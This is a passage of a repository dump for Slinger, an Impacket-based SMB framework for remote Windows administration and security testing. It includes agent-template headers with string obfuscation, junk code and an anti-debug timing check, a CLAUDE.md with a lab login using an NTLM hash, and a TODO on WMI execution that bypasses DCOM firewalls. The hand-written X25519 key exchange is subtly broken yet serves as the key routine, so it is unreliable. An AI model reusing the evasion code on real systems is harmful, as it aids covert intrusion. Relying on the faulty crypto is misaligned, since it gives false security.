53 | std::string decrypt() const { 54 | std::string result; 55 | result.reserve(N - 1); 56 | for (size_t i = 0; i < N - 1; ++i) { 57 | result += static_cast(data[i] ^ derive_key(i + KEY)); 58 | } 59 | return result; 60 | } 61 | }; 62 | 63 | // Function name obfuscation macro 64 | #define OBF_FUNC_NAME(name) obf_##name##_##BUILD_SEED 65 | 66 | // String obfuscation macro 67 | #define OBF_STRING(str) (obfuscated::ObfuscatedString(str)) 68 | 69 | // Control flow obfuscation helpers 70 | template 71 | inline T obfuscate_value(T value) { 72 | volatile uint32_t noise = random_seed(); 73 | return value ^ (noise & 0) ^ (noise & 0); 74 | } 75 | 76 | // Dead code insertion for obfuscation 77 | inline void insert_junk_code() { 78 | volatile int junk = random_seed(); 79 | junk *= 0x1337; 80 | junk += 0xDEADBEEF; 
81 | junk ^= 0xCAFEBABE; 82 | (void)junk; // Suppress unused variable warning 83 | } 84 | 85 | // Anti-debug timing checks (lightweight) 86 | inline bool check_timing() { 87 | auto start = std::chrono::high_resolution_clock::now(); 88 | insert_junk_code(); 89 | auto end = std::chrono::high_resolution_clock::now(); 90 | auto duration = std::chrono::duration_cast(end - start); 91 | return duration.count() < 1000; // Basic timing check 92 | } 93 | 94 | // Simple XOR encoder for runtime strings 95 | class XOREncoder { 96 | private: 97 | uint8_t key; 98 | 99 | public: 100 | XOREncoder() : key(static_cast(random_seed() & 0xFF)) {} 101 | 102 | // Constructor with explicit seed for deterministic key 103 | XOREncoder(uint32_t seed) : key(static_cast(seed & 0xFF)) {} 104 | 105 | std::string encode(const std::string& input) { 106 | std::string result = input; 107 | for (char& c : result) { 108 | c ^= key; 109 | } 110 | return result; 111 | } 112 | 113 | std::string decode(const std::string& input) { 114 | return encode(input); // XOR is symmetric 115 | } 116 | 117 | uint8_t get_key() const { return key; } 118 | }; 119 | 120 | // Stack-based string obfuscation 121 | template 122 | class StackString { 123 | private: 124 | char buffer[SIZE]; 125 | size_t length; 126 | 127 | public: 128 | StackString() : length(0) { 129 | memset(buffer, 0, SIZE); 130 | } 131 | 132 | StackString(const char* str) : length(0) { 133 | assign(str); 134 | } 135 | 136 | void assign(const char* str) { 137 | length = strlen(str); 138 | if (length >= SIZE) length = SIZE - 1; 139 | 140 | uint8_t xor_key = static_cast(random_seed() & 0xFF); 141 | for (size_t i = 0; i < length; ++i) { 142 | buffer[i] = str[i] ^ xor_key; 143 | } 144 | buffer[length] = '\0'; 145 | 146 | // Decode in place 147 | for (size_t i = 0; i < length; ++i) { 148 | buffer[i] ^= xor_key; 149 | } 150 | } 151 | 152 | const char* c_str() const { return buffer; } 153 | size_t size() const { return length; } 154 | }; 155 | 156 | } // namespace obfuscated 157 | 158 | // Obfuscation macros for common use 159 | #define OBFUSCATED_FUNC(ret, name, ...) \ 160 | ret OBF_FUNC_NAME(name)(__VA_ARGS__) 161 | 162 | #define OBFUSCATED_CALL(name, ...) 
\ 163 | OBF_FUNC_NAME(name)(__VA_ARGS__) 164 | -------------------------------------------------------------------------------- /lib/agent_templates/dh_x25519.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include "crypto.h" 5 | 6 | namespace crypto { 7 | 8 | // X25519 Elliptic Curve Diffie-Hellman (Curve25519) 9 | // Provides 128-bit security level with 32-byte keys 10 | // Much faster and simpler than classic DH with large primes 11 | class X25519 { 12 | public: 13 | static const size_t KEY_SIZE = 32; // 256 bits 14 | 15 | private: 16 | // Curve25519 field prime: 2^255 - 19 17 | static void fe25519_add(uint32_t out[10], const uint32_t a[10], const uint32_t b[10]) { 18 | for (int i = 0; i < 10; i++) { 19 | out[i] = a[i] + b[i]; 20 | } 21 | } 22 | 23 | static void fe25519_sub(uint32_t out[10], const uint32_t a[10], const uint32_t b[10]) { 24 | uint32_t c = 0; 25 | for (int i = 0; i < 10; i++) { 26 | c = a[i] - b[i] - c; 27 | out[i] = c & ((1 << 26) - 1); 28 | c = (c >> 26) & 1; 29 | } 30 | } 31 | 32 | static void fe25519_mul(uint32_t out[10], const uint32_t a[10], const uint32_t b[10]) { 33 | uint64_t t[19] = {0}; 34 | for (int i = 0; i < 10; i++) { 35 | for (int j = 0; j < 10; j++) { 36 | t[i + j] += (uint64_t)a[i] * b[j]; 37 | } 38 | } 39 | // Reduce modulo 2^255 - 19 40 | for (int i = 0; i < 10; i++) { 41 | t[i] += (t[i + 10] * 38); 42 | out[i] = t[i] & ((1 << 26) - 1); 43 | t[i + 1] += t[i] >> 26; 44 | } 45 | } 46 | 47 | static void curve25519_scalarmult(uint8_t* out, const uint8_t* scalar, const uint8_t* point) { 48 | // Simplified X25519 - in production use a hardened implementation 49 | // This is a placeholder - you should use Windows BCrypt or OpenSSL for production 50 | 51 | uint8_t clamped_scalar[32]; 52 | memcpy(clamped_scalar, scalar, 32); 53 | clamped_scalar[0] &= 248; 54 | clamped_scalar[31] &= 127; 55 | clamped_scalar[31] |= 64; 56 | 57 | uint32_t x1[10], x2[10] = {1}, z2[10] = {0}, x3[10], z3[10] = {1}; 58 | uint32_t tmp0[10], tmp1[10]; 59 | 60 | // Decode point 61 | for (int i = 0; i < 10; i++) { 62 | x1[i] = point[i * 3] | (point[i * 3 + 1] << 8) | (point[i * 3 + 2] << 16); 63 | } 64 | memcpy(x3, x1, sizeof(x1)); 65 | 66 | // Montgomery ladder 67 | for (int pos = 254; pos >= 0; pos--) { 68 | uint32_t bit = (clamped_scalar[pos / 8] >> (pos & 7)) & 1; 69 | 70 | // Conditional swap 71 | if (bit) { 72 | for (int i = 0; i < 10; i++) { 73 | uint32_t tmp = x2[i]; x2[i] = x3[i]; x3[i] = tmp; 74 | tmp = z2[i]; z2[i] = z3[i]; z3[i] = tmp; 75 | } 76 | } 77 | 78 | // Point addition and doubling 79 | fe25519_add(tmp0, x2, z2); 80 | fe25519_sub(tmp1, x2, z2); 81 | fe25519_mul(x2, tmp0, tmp0); 82 | fe25519_mul(z2, tmp1, tmp1); 83 | fe25519_sub(z2, x2, z2); 84 | fe25519_mul(x2, x2, z2); 85 | fe25519_add(z2, z2, x1); 86 | fe25519_mul(z2, z2, z2); 87 | 88 | if (bit) { 89 | for (int i = 0; i < 10; i++) { 90 | uint32_t tmp = x2[i]; x2[i] = x3[i]; x3[i] = tmp; 91 | tmp = z2[i]; z2[i] = z3[i]; z3[i] = tmp; 92 | } 93 | } 94 | } 95 | 96 | // Encode result 97 | for (int i = 0; i < 10; i++) { 98 | out[i * 3] = x2[i] & 0xff; 99 | out[i * 3 + 1] = (x2[i] >> 8) & 0xff; 100 | out[i * 3 + 2] = (x2[i] >> 16) & 0xff; 101 | } 102 | } 103 | 104 | public: 105 | // Generate a keypair (private key + public key) 106 | static bool generate_keypair(uint8_t* private_key, uint8_t* public_key) { 107 | // Generate random private key 108 | if (!SecureRandom::generate(private_key, KEY_SIZE)) { 109 | return false; 110 | } 111 | 112 | 
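        // The clamp below follows RFC 7748: clear the 3 low bits (so the scalar is a
        // multiple of the cofactor 8), clear the top bit, and set bit 254.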
// Clamp private key (required for X25519) 113 | private_key[0] &= 248; 114 | private_key[31] &= 127; 115 | private_key[31] |= 64; 116 | 117 | // Compute public key = scalar_mult(private_key, basepoint) 118 | uint8_t basepoint[KEY_SIZE] = {9}; // X25519 base point 119 | 120 | // Use pure C++ implementation for cross-platform compatibility 121 | curve25519_scalarmult(public_key, private_key, basepoint); 122 | 123 | return true; 124 | } 125 | 126 | // Compute shared secret from your private key and their public key 127 | static bool compute_shared_secret(const uint8_t* my_private_key, 128 | const uint8_t* their_public_key, 129 | uint8_t* shared_secret) { 130 | // Use pure C++ implementation for cross-platform compatibility 131 | curve25519_scalarmult(shared_secret, my_private_key, their_public_key); 132 | return true; 133 | } 134 | }; 135 | 136 | } // namespace crypto 137 | -------------------------------------------------------------------------------- /CLAUDE.md: -------------------------------------------------------------------------------- 1 | # CLAUDE.md 2 | 3 | This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository. 4 | 5 | ## Project Overview 6 | 7 | Slinger is a Python-based SMB client framework for Windows system administration and security operations. Built on Impacket, it provides an interactive CLI for SMB operations, remote Windows administration, and security testing. 8 | 9 | ## Architecture 10 | 11 | The codebase uses a complex multiple inheritance pattern where `SlingerClient` inherits from ~10 operational modules: 12 | 13 | ``` 14 | CLI Entry (slinger.py) → SlingerClient → Multiple Inheritance Chain: 15 | ├── smblib (SMB operations) 16 | ├── winreg (Registry management) 17 | ├── schtasks (Task scheduling) 18 | ├── scm (Service control) 19 | ├── secrets (Credential operations) 20 | ├── atexec (AT command execution) 21 | ├── wmiexec (WMI execution) 22 | ├── EventLog (Event log analysis) 23 | └── DCETransport (RPC transport) 24 | ``` 25 | 26 | **Key architectural points:** 27 | - Interactive shell with prompt_toolkit 28 | - Plugin system with dynamic loading (`plugins/`) 29 | - Resumable downloads with state persistence (`lib/download_state.py`) 30 | - Complex inheritance chain may create method resolution complexity 31 | 32 | ## Development Commands 33 | 34 | ### Environment Setup 35 | ```bash 36 | # Create and activate virtual environment (REQUIRED) 37 | python -m venv venv 38 | source venv/bin/activate # On Windows: venv\Scripts\activate 39 | 40 | # Install in development mode 41 | pip install -e ".[dev]" 42 | 43 | # Install development dependencies 44 | pip install pytest pytest-cov black flake8 mypy pre-commit pexpect 45 | ``` 46 | 47 | ### Build and Test Commands 48 | ```bash 49 | # Build the project 50 | python scripts/build_script.py 51 | 52 | # Run all tests (requires virtual environment) 53 | pytest 54 | 55 | # Run tests with coverage 56 | pytest --cov=slingerpkg --cov-report=html 57 | 58 | # Run specific test categories 59 | pytest tests/unit 60 | pytest tests/integration 61 | pytest tests/e2e 62 | 63 | # Generate test stubs for new features 64 | python scripts/generate_test_stub.py 65 | 66 | # CLI testing (example HTB target) 67 | python src/slingerpkg/slinger.py --user administrator --host 10.10.11.69 --ntlm :8da83a3fa618b6e3a00e93f676c92a6e 68 | ``` 69 | 70 | ### Quality Commands 71 | ```bash 72 | # Format code 73 | black src/ tests/ 74 | 75 | # Lint 76 | flake8 src/ tests/ 77 | 78 | # Type checking 79 | mypy src/ 80 
| ``` 81 | 82 | ## Key Development Practices 83 | 84 | ### Virtual Environment Requirement 85 | **CRITICAL**: All development, testing, and CLI execution MUST use an active virtual environment. The tool relies on package installation and dependencies that won't work without proper environment isolation. 86 | 87 | ### CLI Command Development 88 | When adding new CLI commands, you MUST: 89 | 1. Add the command parser to `src/slingerpkg/utils/cli.py` 90 | 2. Add the command to the help categorization system in the `categories` dictionary within `print_all_commands_verbose()` 91 | 3. Choose appropriate emoji category (📁 File Operations, 🔍 System Enumeration, etc.) 92 | 4. Test both `help` and `help --verbose` to ensure the command appears 93 | 94 | ### Plugin Development 95 | New plugins go in `src/slingerpkg/plugins/` and must inherit from `PluginBase` (`lib/plugin_base.py`). See `plugins/system_audit.py` for example. 96 | 97 | ## File Structure for New Features 98 | 99 | ### Core SMB Operations 100 | - **File Operations**: Add to `src/slingerpkg/lib/smblib.py` 101 | - **Connection Management**: Enhance `src/slingerpkg/lib/slingerclient.py` 102 | 103 | ### Windows Administration 104 | - **Service Operations**: `src/slingerpkg/lib/scm.py` 105 | - **Registry Operations**: `src/slingerpkg/lib/winreg.py` 106 | - **Task Scheduling**: `src/slingerpkg/lib/schtasks.py` 107 | - **Process Management**: `src/slingerpkg/lib/process_tree.py` 108 | 109 | ### CLI and User Interface 110 | - **New Commands**: Add parsers to `src/slingerpkg/utils/cli.py` 111 | - **Output Formatting**: `src/slingerpkg/utils/printlib.py` 112 | - **Configuration**: `src/slingerpkg/var/config.py` 113 | 114 | ### Testing 115 | - **Unit Tests**: `tests/unit/test_.py` 116 | - **Integration Tests**: `tests/integration/` 117 | - **Test Fixtures**: `tests/fixtures/` 118 | 119 | ## Important Notes 120 | 121 | ### Resume Downloads Feature 122 | The project includes comprehensive resumable download functionality with: 123 | - `--resume` flag for resuming interrupted downloads 124 | - `--restart` flag for forcing fresh downloads 125 | - JSON-based state management 126 | - MD5 integrity verification 127 | - Chunked download with retry logic 128 | 129 | ### Testing Requirements 130 | - Use pexpect for interactive CLI testing 131 | - HTB integration tests use target 10.10.11.69 132 | - Always activate virtual environment before testing 133 | - MD5 verification required for download integrity tests 134 | 135 | ### Dependencies 136 | Key dependencies from pyproject.toml: 137 | - impacket==0.11.0 (core SMB functionality) 138 | - prompt_toolkit==3.0.41 (interactive CLI) 139 | - pycryptodome==3.20.0 (cryptographic operations) 140 | - tabulate==0.8.9 (output formatting) 141 | - pexpect (testing framework) 142 | -------------------------------------------------------------------------------- /docs/TODO.md: -------------------------------------------------------------------------------- 1 | ### Task Scheduler 2 | - load task xml 3 | 4 | ### Registry 5 | 6 | - None 7 | 8 | ### Service Control 9 | - sc modify 10 | 11 | ### General 12 | 13 | ### SMB 14 | - add a share #hNetrShareAdd 15 | - remove a share #hNetrShareEnum 16 | 17 | ## Current Enhancement Tasks 18 | 19 | ### High Priority 20 | 1. 
**Add verbose flag to show statements like remote path transformations** 21 | - Default: false 22 | - Configurable via set config command 23 | - Show statements like "[*] Remote Path (Before): KeePass-2.58.zip" and "[*] Remote Path (After): IT\KeePass-2.58.zip" 24 | 25 | 2. **Allow user to specify different filename when downloading** 26 | - Support syntax: `get KeePass-2.58.zip /tmp/test.zip` 27 | - Fix error: "[!] Local path /tmp/test.zip does not exist." 28 | - Should create the file at specified location with custom name 29 | 30 | 3. ✅ **Fix put relative path uploads issue** (COMPLETED) 31 | - ✅ Fixed double path joining bug in _resolve_remote_path method 32 | - ✅ Added proper handling for `../` and `../../` parent directory references 33 | - ✅ Enhanced path resolution for `.`, empty paths, and simple filenames 34 | - ✅ Tested with debug scripts and pexpect integration test 35 | - Location: `src/slingerpkg/lib/smblib.py` lines 1697-1748 36 | 37 | 38 | ### Medium Priority 39 | 4. ✅ **Fix navigation above root to default to root location** (COMPLETED) 40 | - ✅ Added protection in _normalize_path_for_smb method to detect above-root navigation 41 | - ✅ Automatically redirects users to root when attempting to navigate above share root 42 | - ✅ Shows user-friendly warning message: "Cannot navigate above share root. Redirecting to root directory." 43 | - ✅ Tested with pexpect integration test - confirmed working on HTB instance 44 | - Location: `src/slingerpkg/lib/smblib.py` lines 1679-1685 45 | 46 | 5. ✅ **Add option to save ls -r output to a file** (COMPLETED) 47 | - ✅ CLI argument `-o/--output` already implemented for output file specification 48 | - ✅ `--show` option already implemented to display saved file contents 49 | - ✅ Integrated with existing tee_output functionality 50 | - ✅ Tested and confirmed working: `ls -o filename.txt` saves output 51 | - ✅ Recursive support: `ls -r depth -o filename.txt` saves recursive listing 52 | - Location: `src/slingerpkg/utils/cli.py` lines 359-366, `src/slingerpkg/lib/smblib.py` lines 763-922 53 | 54 | 6. 
✅ **wmi exec** (COMPLETED - DCE Transport Integration) 55 | - ✅ Created comprehensive WMI named pipe execution framework 56 | - ✅ Implemented SMB named pipe transport to bypass DCOM firewall restrictions 57 | - ✅ **ENHANCED**: Integrated with existing DCE transport infrastructure 58 | - ✅ **NEW**: Added WMI UUIDs to uuid_endpoints dictionary for proper RPC binding 59 | - ✅ **NEW**: Added _connect_wmi_service() and _wmi_execute_process() to DCETransport class 60 | - ✅ **NEW**: Modified WMI implementation to reuse existing DCE connections 61 | - ✅ Added WMI endpoint discovery and testing capabilities 62 | - ✅ Full CLI integration with extensive argument parsing 63 | - ✅ Interactive and non-interactive modes with output capture 64 | - ✅ Enhanced security through existing SMB authentication reuse 65 | - ✅ Based on comprehensive research in docs/WMI_NAMED_PIPE_EXECUTION_RESEARCH.md 66 | - Location: `src/slingerpkg/lib/wmi_namedpipe.py`, `src/slingerpkg/lib/dcetransport.py`, CLI: `src/slingerpkg/utils/cli.py` lines 1523-1571 67 | - **Status**: Framework integrated with DCE transport - ready for production use with Impacket RPC calls 68 | - ✅ **NEW**: Memory capture research and implementation completed 69 | - ✅ **NEW**: Added --memory-capture flag for stdout/stderr capture without disk files 70 | - ✅ **NEW**: PowerShell-based WMI class creation for temporary output storage 71 | - ✅ **NEW**: Automatic cleanup of temporary WMI classes 72 | - Research documented in: `docs/WMI_STDOUT_CAPTURE_RESEARCH.md` 73 | 74 | 7. ✅ **WMI DCOM Interactive Shell with Directory Navigation** (COMPLETED) 75 | - ✅ Complete WMI DCOM interactive shell implementation with persistent directory tracking 76 | - ✅ Full directory navigation support with cd command (relative, absolute, parent navigation) 77 | - ✅ Working directory integration for all WMI command execution with real-time prompt display 78 | - ✅ Cross-share file operations and optimized parameter usage with configurable options 79 | - ✅ Support for both CMD and PowerShell execution contexts 80 | - ✅ Path normalization and robust directory handling 81 | - ✅ Interactive pseudo-shell with proper prompt prefixing (WMI/PS-WMI) 82 | - ✅ Session persistence and output logging capabilities 83 | - Location: `src/slingerpkg/lib/wmiexec.py`, CLI: `src/slingerpkg/utils/cli.py` 84 | - Documentation: `docs/WMI_DIRECTORY_NAVIGATION_COMPLETE.md`, `docs/WMI_WORKING_DIRECTORY_INTEGRATION_COMPLETE.md` 85 | 86 | ### Future Enhancements 87 | 8. **System Change Tracking** 88 | - Add a way to track changes made to the system to show a report for later 89 | - Track file modifications, service changes, registry edits, scheduled tasks 90 | - Generate comprehensive audit reports of all system modifications 91 | - Integration with existing logging infrastructure 92 | 93 | 9. 
**Cross-Shell Directory Synchronization** 94 | - Synchronize cd across WMI shells and native SMB 95 | - Maintain consistent working directory state across different execution contexts 96 | - Bidirectional directory synchronization between SMB navigation and WMI shells 97 | - Unified directory state management 98 | -------------------------------------------------------------------------------- /.github/workflows/cli-flag-standards.yml: -------------------------------------------------------------------------------- 1 | name: CLI Flag Standards Check 2 | 3 | on: 4 | pull_request: 5 | branches: [main, develop] 6 | paths: 7 | - 'src/**/*.py' 8 | push: 9 | branches: [main, develop] 10 | paths: 11 | - 'src/**/*.py' 12 | 13 | jobs: 14 | check-cli-flags: 15 | runs-on: ubuntu-latest 16 | 17 | steps: 18 | - uses: actions/checkout@v4 19 | 20 | - name: Set up Python 21 | uses: actions/setup-python@v5 22 | with: 23 | python-version: '3.11' 24 | 25 | - name: Install dependencies 26 | run: | 27 | python -m pip install --upgrade pip 28 | pip install -e . 29 | 30 | - name: Check CLI flag naming standards 31 | run: | 32 | python -c " 33 | import re 34 | import sys 35 | import ast 36 | from pathlib import Path 37 | 38 | def extract_add_argument_calls(file_path): 39 | '''Extract all add_argument calls from a Python file''' 40 | try: 41 | with open(file_path, 'r') as f: 42 | content = f.read() 43 | 44 | tree = ast.parse(content) 45 | violations = [] 46 | 47 | for node in ast.walk(tree): 48 | if (isinstance(node, ast.Call) and 49 | isinstance(node.func, ast.Attribute) and 50 | node.func.attr == 'add_argument'): 51 | 52 | # Get the first argument (the flag name) 53 | if node.args: 54 | arg = node.args[0] 55 | if isinstance(arg, ast.Str): 56 | flag_name = arg.s 57 | elif isinstance(arg, ast.Constant) and isinstance(arg.value, str): 58 | flag_name = arg.value 59 | else: 60 | continue 61 | 62 | # Check for violations 63 | violation = check_flag_standards(flag_name, node.lineno) 64 | if violation: 65 | violations.append((file_path, violation)) 66 | 67 | return violations 68 | except Exception as e: 69 | print(f'Error parsing {file_path}: {e}') 70 | return [] 71 | 72 | def check_flag_standards(flag_name, line_no): 73 | '''Check if flag name adheres to standards''' 74 | # Skip positional arguments (no hyphens) 75 | if not flag_name.startswith('-'): 76 | return None 77 | 78 | # Single letter flags should use single hyphen 79 | if len(flag_name) == 2 and flag_name.startswith('-') and not flag_name.startswith('--'): 80 | if flag_name[1].isalpha(): 81 | return None # Correct: -l, -v, etc. 82 | 83 | # Multi-letter flags should use double hyphen 84 | if len(flag_name) > 2 and flag_name.startswith('--'): 85 | return None # Correct: --list, --verbose, etc. 
86 | 87 | # Violations 88 | violations = [] 89 | 90 | # Single letter with double hyphen: --l 91 | if len(flag_name) == 3 and flag_name.startswith('--') and flag_name[2].isalpha(): 92 | violations.append(f'Line {line_no}: Single letter flag \"{flag_name}\" should use single hyphen: \"-{flag_name[2]}\"') 93 | 94 | # Multi-letter with single hyphen: -list 95 | elif len(flag_name) > 2 and flag_name.startswith('-') and not flag_name.startswith('--'): 96 | violations.append(f'Line {line_no}: Multi-letter flag \"{flag_name}\" should use double hyphen: \"-{flag_name}\"') 97 | 98 | return violations[0] if violations else None 99 | 100 | # Check only CLI-related files, exclude internal tools like secretsdump 101 | src_dir = Path('src') 102 | all_violations = [] 103 | 104 | cli_files = [ 105 | src_dir / 'slingerpkg' / 'utils' / 'cli.py', 106 | src_dir / 'slingerpkg' / 'slinger.py' 107 | ] 108 | 109 | for py_file in cli_files: 110 | if py_file.exists(): 111 | violations = extract_add_argument_calls(str(py_file)) 112 | all_violations.extend(violations) 113 | 114 | # Report violations 115 | if all_violations: 116 | print('❌ CLI Flag Standard Violations Found:') 117 | print('=' * 50) 118 | print('Standard: Single letter flags use single hyphen (-l), multi-letter flags use double hyphen (--list)') 119 | print() 120 | 121 | for file_path, violation in all_violations: 122 | print(f'📁 {file_path}') 123 | print(f' {violation}') 124 | print() 125 | 126 | print(f'Total violations: {len(all_violations)}') 127 | sys.exit(1) 128 | else: 129 | print('✅ All CLI flags adhere to naming standards!') 130 | print('Standard: Single letter flags use single hyphen (-l), multi-letter flags use double hyphen (--list)') 131 | " 132 | 133 | - name: Comment on PR if violations found 134 | if: failure() && github.event_name == 'pull_request' 135 | uses: actions/github-script@v7 136 | with: 137 | script: | 138 | const message = ` 139 | ## ❌ CLI Flag Naming Standard Violations 140 | 141 | This PR contains CLI flags that don't follow the project's naming standards: 142 | 143 | **Standard:** 144 | - Single letter flags: Use single hyphen (e.g., \`-l\`, \`-v\`, \`-h\`) 145 | - Multi-letter flags: Use double hyphen (e.g., \`--list\`, \`--verbose\`, \`--help\`) 146 | 147 | **Common Violations:** 148 | - ❌ \`--l\` should be \`-l\` 149 | - ❌ \`-list\` should be \`--list\` 150 | - ❌ \`-verbose\` should be \`--verbose\` 151 | 152 | Please fix the flag naming to match the standards before merging. 
153 | `; 154 | 155 | github.rest.issues.createComment({ 156 | issue_number: context.issue.number, 157 | owner: context.repo.owner, 158 | repo: context.repo.repo, 159 | body: message 160 | }); 161 | -------------------------------------------------------------------------------- /src/slingerpkg/utils/printlib.py: -------------------------------------------------------------------------------- 1 | import inspect 2 | from slingerpkg.utils.logger import SlingerLogger, error_logging 3 | from slingerpkg.var.config import config_vars 4 | import os 5 | 6 | 7 | class colors: 8 | HEADER = "\033[95m" 9 | OKBLUE = "\033[94m" 10 | OKGREEN = "\033[0;32m" 11 | WARNING = "\033[91m" 12 | BLUE = "\033[0;34m" 13 | YELLOW = "\033[93m" 14 | FAIL = "\033[1;31m" 15 | ENDC = "\033[0m" 16 | 17 | 18 | def get_config_value(key): 19 | try: 20 | for c in config_vars: 21 | if c["Name"].lower() == key.lower(): 22 | return c["Value"] 23 | print_warning(f"Config variable {key} does not exist") 24 | except KeyError: 25 | print_warning(f"Config variable {key} does not exist") 26 | return 27 | 28 | 29 | def print_block(msg, color=colors.YELLOW, block_char="*", max_width=50): 30 | """ 31 | Prints a centered block with top and bottom borders only. 32 | Ensures borders expand at least 2 characters left and right beyond the message. 33 | 34 | Args: 35 | msg (str): The message to display. 36 | block_char (str): The character to use for the border. 37 | max_width (int): The maximum width of the block (default 50). 38 | """ 39 | # Calculate the total width (message + 4 spaces for padding) 40 | required_width = len(msg) + 4 41 | 42 | # Truncate the message if necessary 43 | if required_width > max_width: 44 | max_msg_length = max_width - 7 # 3 for "..." and 4 for padding 45 | msg = msg[:max_msg_length] + "..." 46 | required_width = max_width 47 | 48 | # Calculate padding for centering 49 | padding = (required_width - len(msg)) // 2 50 | centered_msg = f"{' ' * padding}{msg}{' ' * (required_width - len(msg) - padding)}" 51 | 52 | # Print the block 53 | border = block_char * required_width 54 | print_log(f"{color}{border}{colors.ENDC}") # Top border 55 | # print_log(centered_msg) # Centered message 56 | print_log(f"{color}{centered_msg}{colors.ENDC}") 57 | # print_log(border) # Bottom border 58 | print_log(f"{color}{border}{colors.ENDC}") 59 | 60 | 61 | def print_log(msg="", end="\n"): 62 | # TODO: test codecs 63 | # print(msg.encode().decode(get_config_value("Codec")), end=end) 64 | 65 | print(msg, end=end) 66 | try: 67 | # TODO: test codecs 68 | # log.debug(msg.encode().decode(get_config_value("Codec"))) 69 | log.debug(msg) 70 | except Exception as e: 71 | print_warning(f"Unable to write to log file: {e}") 72 | raise e 73 | 74 | 75 | def print_good(msg): 76 | print_log(f"{colors.OKGREEN}[+] {msg}{colors.ENDC}") 77 | 78 | 79 | def print_bad(msg): 80 | print_log(f"{colors.FAIL}[-] {msg}{colors.ENDC}") 81 | 82 | 83 | def print_warning(msg): 84 | print_log(f"{colors.WARNING}[!] 
{msg}{colors.ENDC}") 85 | 86 | 87 | def print_info(msg): 88 | print_log(f"{colors.HEADER}[*] {msg}{colors.ENDC}") 89 | 90 | 91 | def print_verbose(msg): 92 | if get_config_value("Verbose") or get_config_value("Debug"): 93 | print_log(f"{colors.HEADER}[*] {msg}{colors.ENDC}") 94 | 95 | 96 | def print_debug(msg, e=None, force_debug=False): 97 | # find the Debug Dict in config 98 | from datetime import datetime 99 | 100 | if e: 101 | verbose_trace = error_logging(e) 102 | else: 103 | verbose_trace = "" 104 | 105 | current_frame = inspect.currentframe().f_back 106 | 107 | line_number = current_frame.f_lineno 108 | 109 | module = inspect.getmodule(current_frame) 110 | module_name = module.__name__ if module else "unknown" 111 | timestamp = datetime.now().strftime("%H:%M:%S.%f")[:-3] # HH:MM:SS.mmm 112 | debug_msg = f""" 113 | ********************************************* 114 | [DEBUG][{timestamp}][{module_name}][Line {line_number}]:{colors.HEADER}{msg}{colors.ENDC} 115 | {verbose_trace} 116 | [DEBUG]{trace_print("Traceback (most recent call last):", trace_calls=True)} 117 | ********************************************* 118 | """ 119 | 120 | if not get_config_value("Debug"): 121 | log.debug(debug_msg) 122 | if not force_debug: 123 | return 124 | print_log(debug_msg) 125 | 126 | 127 | def trace_print(*args, **kwargs): 128 | # Print the standard message 129 | # print_log(*args, **kwargs) 130 | 131 | # Check if tracing is requested 132 | if kwargs.get("trace_calls", False): 133 | # Create a stack trace from the current frame 134 | frame = inspect.currentframe().f_back 135 | 136 | # Initialize the message variable 137 | message = "" 138 | 139 | # Iterate over the frames and append the call series to the message 140 | message += "Call trace:\n" 141 | while frame: 142 | module = inspect.getmodule(frame) 143 | if module: 144 | module_name = module.__name__ 145 | else: 146 | module_name = "(unknown module)" 147 | 148 | filename = frame.f_code.co_filename 149 | lineno = frame.f_lineno 150 | funcname = frame.f_code.co_name 151 | message += f"\t{module_name}: {funcname} in {filename}, line {lineno}\n" 152 | 153 | frame = frame.f_back 154 | 155 | # Return the message 156 | return message 157 | 158 | 159 | def print_struct(struct, indent=0): 160 | """Recursively print a struct without knowing the keys.""" 161 | spacing = " " * indent 162 | if isinstance(struct, dict): 163 | for key, value in struct.items(): 164 | if isinstance(value, (dict, list)): 165 | print(f"{spacing}{key}:") 166 | print_struct(value, indent + 4) 167 | else: 168 | if isinstance(value, bytes): 169 | value = value.decode("utf-8", errors="replace") 170 | print(f"{spacing}{key}: {value}") 171 | elif isinstance(struct, list): 172 | for index, item in enumerate(struct): 173 | print(f"{spacing}[{index}]:") 174 | print_struct(item, indent + 4) 175 | else: 176 | if isinstance(struct, bytes): 177 | struct = struct.decode("utf-8", errors="replace") 178 | print(f"{spacing}{struct}") 179 | 180 | 181 | log_location = os.path.expanduser(get_config_value("Logs_Folder")) 182 | # Initialize the logger at the start of your application 183 | log = SlingerLogger(log_location, "slingerlog").get_logger() 184 | 185 | logwriter = log 186 | -------------------------------------------------------------------------------- /scripts/generate_test_stub.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Generate test stub for a new Slinger command 4 | """ 5 | import os 6 | import sys 7 | from 
pathlib import Path 8 | from datetime import datetime 9 | 10 | 11 | UNIT_TEST_TEMPLATE = '''""" 12 | Unit tests for {command} command 13 | Generated: {date} 14 | """ 15 | import pytest 16 | from unittest.mock import Mock, patch 17 | import sys 18 | 19 | sys.path.insert(0, 'src') 20 | 21 | 22 | class Test{command_class}: 23 | """Unit tests for {command} command""" 24 | 25 | @pytest.fixture 26 | def mock_client(self): 27 | """Create mock Slinger client""" 28 | client = Mock() 29 | client.connected = True 30 | client.host = "192.168.1.100" 31 | client.username = "testuser" 32 | client.shares = ["C$", "ADMIN$", "IPC$"] 33 | client.pwd = "C$\\\\" 34 | client.use_share = "C$" 35 | return client 36 | 37 | def test_{command}_basic(self, mock_client): 38 | """Test basic {command} functionality""" 39 | # TODO: Implement test 40 | # Example: 41 | # result = mock_client.{command}() 42 | # assert result is not None 43 | assert False, "Test not implemented" 44 | 45 | def test_{command}_with_arguments(self, mock_client): 46 | """Test {command} with various arguments""" 47 | # TODO: Test different argument combinations 48 | assert False, "Test not implemented" 49 | 50 | def test_{command}_error_handling(self, mock_client): 51 | """Test {command} error scenarios""" 52 | # TODO: Test error cases 53 | # Example: 54 | # mock_client.{command}.side_effect = Exception("Test error") 55 | # with pytest.raises(Exception): 56 | # result = command_function(mock_client) 57 | assert False, "Test not implemented" 58 | 59 | def test_{command}_edge_cases(self, mock_client): 60 | """Test {command} edge cases""" 61 | # TODO: Test boundary conditions, empty inputs, etc. 62 | assert False, "Test not implemented" 63 | ''' 64 | 65 | INTEGRATION_TEST_TEMPLATE = '''""" 66 | Integration tests for {command} command 67 | Generated: {date} 68 | """ 69 | import pytest 70 | from tests.fixtures.mock_smb_server import MockSMBServer 71 | from tests.fixtures.cli_runner import SlingerTestRunner, run_command_test 72 | 73 | 74 | class Test{command_class}Integration: 75 | """Integration tests for {command} command""" 76 | 77 | @pytest.fixture 78 | def mock_server(self): 79 | """Create mock SMB server""" 80 | server = MockSMBServer() 81 | # TODO: Configure mock server for {command} testing 82 